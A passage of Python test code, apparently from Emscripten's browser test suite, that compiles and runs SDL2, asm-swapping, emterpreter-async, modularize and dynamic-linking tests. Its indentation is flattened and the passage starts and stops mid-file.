open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
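# Sketch of a small helper that could consolidate the repeated "move the generated
# secondary output into sub/ so that locateFile has something to resolve" steps in
# test_locate_file above. The helper name is hypothetical and not used elsewhere.
def relocate_secondary_output(wasm, subdir='sub'):
  import os
  import shutil
  if not os.path.exists(subdir):
    os.mkdir(subdir)
  # wasm builds emit page.wasm; asm.js builds emit a separate memory init file
  name = 'page.wasm' if wasm else 'page.html.mem'
  shutil.move(name, os.path.join(subdir, name))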
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
run_process([PYTHON, EMCC, 'second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
assert os.path.exists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also gives -O2 coverage for --preload-file and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@flaky
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
run_process([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
with open('pre.js', 'w') as f:
f.write('Error.stackTraceLimit = 80;\n')
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3', '--pre-js', 'pre.js', ])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause a timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
run_process([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'BINARYEN_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
run_process([PYTHON, EMCC, 'test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
